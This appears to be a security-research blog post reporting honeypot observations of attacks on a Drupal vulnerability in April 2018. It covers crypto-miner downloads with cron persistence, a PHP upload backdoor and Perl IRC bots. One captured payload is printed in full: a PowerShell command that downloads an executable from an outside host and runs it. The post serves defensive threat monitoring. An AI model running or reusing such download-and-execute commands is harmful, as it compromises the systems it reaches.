Pretty much as soon as the exploit became publicly available, our honeypots started seeing attacks that used the exploit. Ever since then, we are seeing waves of exploit attempts hitting our honeypots. The very first request for "/user/register" we saw came on April 6th. But the source was a tor endpoint, and it scanned for a wide range of vulnerabilities at the time:
At the time, our honeypot did not yet emulate Drupal. The request above is not consistent with the exploit. "/user/register" is often used to fingerprint Drupal.
The first request that is consistent with the exploit arrived on April 13th.
Note how it uses a fake referrer ("Baidu"). We know the referrer is fake because by clicking on a search engine link, you would not send a POST request. Kind of odd that this referrer is used and I am not sure how it would evade any filters.
Moving forward, here are some of the top exploit payloads we have seen so far:
Miners are #1
This exploit downloads a crypto coin miner and then, in a second exploit attempt, starts it. These three commands are sent as two distinct exploit requests (first either the "curl" or the "wget" command, then followed by the execution). We have seen a total of 3814 requests. The configuration file for the miner indicates that it connects to the mining pool on port 444 or 443.and the IP addresses used for far are 126.96.36.199 and 188.8.131.52. As usual, it gains persistence by adding a cron job to restart the miner.
This is a very simple PHP backdoor. It downloads a file from Github that implements a simple file upload feature. The attacker can now come back and upload additional files (backdoors).
Perl Bots Are Still a Thing
As a Perl fan, it is nice to see that IRC bots written in Perl are still "a thing". We saw about 200 requests like this:
Aside from many "vulnerability scanner" scripts that echo back a string to show the system is vulnerable, There was also one exploit attempt looking for Drupal running on Windows:
powershell -Command (New-Object System.Net.WebClient).DownloadFile('http://tc8zdw.if1j0ytgkypa.tk/sv.exe','asdf.exe');(New-Object -com Shell.Application).ShellExecute('asdf.exe')
I am getting 403 errors connecting to the URL, but Virustotal shows that some AV vendors marked it as suspect (surprise!).
At this point, you should expect that an unpatched Drupal instance has been exploited. The exploit has been enhanced to work against Drupal version 7 and 8 (initially it only worked against 8).Intrusion Detection In-Depth - SANS Baltimore Spring 2020
Apr 17th 2018
1 year ago